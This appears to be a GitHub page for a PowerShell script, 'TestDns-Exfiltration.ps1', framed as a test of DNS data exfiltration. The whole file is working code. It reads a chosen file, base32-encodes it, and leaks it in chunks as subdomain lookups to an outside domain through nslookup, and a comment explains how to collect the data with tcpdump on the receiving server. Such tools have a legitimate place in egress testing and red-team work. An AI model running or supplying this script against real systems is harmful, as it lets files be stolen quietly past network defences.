-
Notifications
You must be signed in to change notification settings - Fork 1
/
TestDns-Exfiltration.ps1
40 lines (36 loc) · 1.61 KB
/
TestDns-Exfiltration.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# On your DNS server you may use tcpdump to get the results (tcpdump -n port 53)
function TestDns-Exfiltration {
param(
[string] $filePath,
[string] $domain,
[string] $dns = "8.8.8.8",
[int16] $blocksize = 32)
write-host "DNS File Exfiltration Test - @fgsec" -ForegroundColor "yellow"
$block_size = $blocksize
if(Test-Path($filePath)) {
[byte[]] $bytes = [IO.File]::ReadAllBytes($filePath)
$byteArrayAsBinaryString = -join $bytes.ForEach{[Convert]::ToString($_, 2).PadLeft(8, '0')}
$Base32string = [regex]::Replace($byteArrayAsBinaryString, '.{5}', { param($Match) 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'[[Convert]::ToInt32($Match.Value, 2)] })
$total_requests = [math]::truncate(($Base32string.length/$block_size))+1
write-host "[-] File length:" $Base32string.length
write-host "[-] Total requests to transfer this file:" $total_requests
read-host "Press enter to start"
$key_start = 0
$key_end = $block_size
$p = 0
while($key_end -le ($Base32string.length)) {
$payload = ($Base32string[$key_start..$key_end]) -join ""
$url = "$payload.$domain".ToLower();
write-host "[!] Request to: $url" -ForegroundColor gray
nslookup -type=A $url
$key_start = $key_end+1
$key_end = $key_end + $block_size
$p++
start-sleep -Seconds 1
}
} else {
write-host "File not found!" -ForegroundColor red
}
write-host "[#] Done" -ForegroundColor green
}
TestDns-Exfiltration "C:\users\public\testfile.docx" "yourdomain"